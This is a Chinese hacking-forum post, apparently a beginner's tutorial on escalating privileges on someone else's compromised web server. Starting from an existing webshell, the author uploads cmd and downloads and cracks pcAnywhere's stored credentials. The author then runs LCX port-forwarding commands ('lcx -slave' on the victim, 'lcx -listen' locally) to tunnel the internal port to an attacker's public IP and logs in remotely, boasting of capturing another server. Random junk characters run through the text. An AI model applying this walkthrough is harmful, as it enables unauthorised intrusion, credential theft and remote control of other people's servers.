- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。$ p* E6 w6 o! ^
- f y' }2 x* `( v1 W G2 {7 Q
提权方法:pcanywhere+LCX
1 n/ S' O4 {4 @% S. E. X4 H* o5 D
1 i* T+ E- j% T o( {, n% R获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
& G, s* ?. g% k2 `7 i7 \0 r- ^! F. U. b$ @6 a
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
* Y$ @& s/ B- l+ g" J
2 Y2 Y2 N$ q+ r- [7 ]6 ]( u
1 C( m& k' ^4 }" k查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。! C6 e1 R `/ D$ J
, n9 m1 g; j% T1 i
2 w- P9 u9 s1 {! N. ]! k& Y9 d
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。; u) p% d, ?* @+ o- C8 w0 r8 k
: f1 [5 L2 j1 S' S' \) R& X# n2 Z F9 F8 t! Q
# a, {; }; `: j* l0 k
% ]1 S g5 k A. [3 H4 U2 m由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
& b& }9 O1 V X$ \3 f$ T# }5 a
9 N4 _( J6 C1 ^
" R- A1 T0 ^# U- rLCX的用法再简单说下:
2 T) b5 ]( B. m9 y$ J7 S. P+ T8 h! A7 a" E
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
6 K4 M. c# g8 r0 q
9 g, ?( g: V$ Z) {本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
" A' F2 \' |, |& [2 g/ r& u# M* d! e" t" Z# H
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。4 i* E. A# m, K3 v/ S7 s3 X3 r
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``$ X" F6 h! h7 R6 Z7 H
3 s; h. v' ]% ]+ Q2 ^
8 Y! g# R7 b# x1 ?. B6 ]* Z. k3 u& I
, b# g5 N6 ?5 B1 h0 M6 i4 \ P4 U呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。9 l) ^ P8 B D t) L( g
{/ E6 }* g2 P( g$ Q$ l' c
7 Y* A3 w8 g. L5 l+ W
, M% h8 G; }; k* ^9 s4 k8 q* u9 H7 n
7 k+ K6 R: g0 F/ J我们本地连接试试,输入我们刚破解的账号密码
% i- g* G/ O4 d! a
! A7 }. e/ L5 P) O; Y1 u. q. H7 T' U$ Q6 \6 V9 S
呵呵``连接成功,服务器不错,又一个8核^︵^" f$ n& ]* z6 h E( q8 A
( c7 p1 H* x2 S6 ?+ t
& F; z) z% E' [8 a0 A: w4 e8 C* {: m! e8 y! h$ B
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|